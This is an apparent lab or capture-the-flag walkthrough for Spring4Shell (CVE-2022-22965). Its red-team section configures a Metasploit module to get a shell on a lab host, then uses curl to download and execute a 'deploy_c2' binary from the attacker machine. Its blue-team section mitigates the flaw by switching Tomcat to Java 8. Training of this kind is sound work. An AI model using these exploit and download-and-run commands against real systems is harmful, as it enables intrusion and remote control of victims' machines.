## https://sploitus.com/exploit?id=E3932EE9-E16C-54B3-901C-0E66AAF4B0BA
# Spring4Shell Threat Sandbox (CVE-2022-22965)
## Overview
This walkthrough documents the completion of the Sandbox Challenge focused on CVE-2022-22965, commonly known as Spring4Shell โ a critical (CVSS 9.8/10) remote code execution vulnerability affecting specific versions of the Spring Java framework. The challenge covers both offensive (red team) and defensive (blue team) perspectives of the vulnerability.
**Note:** Commands and file paths in this walkthrough reflect the specific environment used during this attempt. Your environment may differ โ adjust paths, IP addresses, and filenames accordingly.
---
## Environment
| Machine | IP Address | Role |
|---|---|---|
| Security-Desk (Kali Linux) | 172.16.200.12 | Attack and work machine |
| Red Target (Linux) | 172.16.100.90 | Exploitation target |
| Blue Target (Linux) | 172.16.100.100 | Hardening target |
**Credentials:** playerone / password123
---
## Red Team Objective: Deploy C2 Listener on Red Target
### Step 1 โ Identify the Target
Reviewed the Network Map tab in the challenge panel to confirm the Red Target IP (172.16.100.90). Used curl to inspect the web application running on port 80:
```bash
curl http://172.16.100.90
```
Output revealed Apache Tomcat 9.0.59 with a redirect to `/dasmsp`. Browsed the page source to identify a POST form endpoint at `/dasmsp/contact`.
### Step 2 โ Launch Metasploit and Configure the Exploit
```bash
msfconsole
```
```
use exploit/multi/http/spring_framework_rce_spring4shell
set RHOSTS 172.16.100.90
set LHOST 172.16.200.12
set RPORT 80
set TARGETURI /dasmsp/contact
set PAYLOAD_PATH webapps/ROOT
set HTTP_METHOD POST
set ForceExploit true
run
```
The exploit successfully generated a JSP shell, modified the class loader, flushed the log file, and opened a command shell session on the Red Target.
### Step 3 โ Obtain an Interactive Shell
After the session opened, entered `shell` to upgrade to an interactive shell. Metasploit located `/usr/bin/script` on the target and used it to pop an interactive shell as the `tomcat` user.
### Step 4 โ Transfer and Execute deploy_c2
The `deploy_c2` binary was located on the Security-Desk, not the Red Target. Hosted it via a Python3 HTTP server on the Security-Desk:
```bash
cd /home/playerone/Desktop/Resources/
python3 -m http.server 8080
```
Downloaded and executed it from within the Red Target shell session:
```bash
curl http://172.16.200.12:8080/deploy_c2 -o /tmp/deploy_c2
chmod +x /tmp/deploy_c2
/tmp/deploy_c2
```
Output confirmed: `Done!` โ C2 listener successfully deployed on the Red Target.
---
## Blue Team Objective: Mitigate CVE-2022-22965 on Blue Target (Downgrade to Java 8)
### Step 1 โ SSH into the Blue Target
From the Security-Desk terminal:
```bash
ssh playerone@172.16.100.100
```
Password: `password123`
### Step 2 โ Transfer Java 8 Packages to the Blue Target
The Java 8 `.deb` packages were located on the Security-Desk at `/home/playerone/Desktop/Resources/`. Transferred them to the Blue Target using SCP from a Security-Desk terminal:
```bash
scp /home/playerone/Desktop/Resources/*.deb playerone@172.16.100.100:/tmp/
```
Packages transferred:
- adoptium-ca-certificates_1.0.2-1_all.deb
- fonts-dejavu_2.37-6_all.deb
- p11-kit-modules_0.24.1-2_amd64.deb
- p11-kit_0.24.1-2_amd64.deb
- temurin-8-jdk_8.0.402.0.0+6_amd64.deb
### Step 3 โ Install Java 8 Packages
On the Blue Target SSH session:
```bash
sudo dpkg -i /tmp/*.deb
```
### Step 4 โ Set Java 8 as the Default (Known Issue Workaround)
Due to a known challenge issue, the check does not register correctly without manually setting Java 8 as the default:
```bash
sudo update-alternatives --config java
```
Selected option `2` โ `/usr/lib/jvm/temurin-8-jdk-amd64/bin/java`.
### Step 5 โ Update the Tomcat Service to Use Java 8
Inspected the Tomcat service unit file:
```bash
cat /etc/systemd/system/tomcat.service
```
Edited the file to update the JAVA_HOME environment variable:
```bash
sudo nano /etc/systemd/system/tomcat.service
```
Changed:
```
Environment="JAVA_HOME=/usr"
```
To:
```
Environment="JAVA_HOME=/usr/lib/jvm/temurin-8-jdk-amd64"
```
### Step 6 โ Reload and Restart Tomcat
```bash
sudo systemctl daemon-reload
sudo systemctl restart tomcat
```
The CVE-2022-22965 Mitigated on Blue Target check turned green in the challenge panel.
---
## Tools Used
- Metasploit Framework (`spring_framework_rce_spring4shell` module)
- curl
- Python3 HTTP Server
- SSH / SCP
- dpkg
- systemctl
- update-alternatives
- nano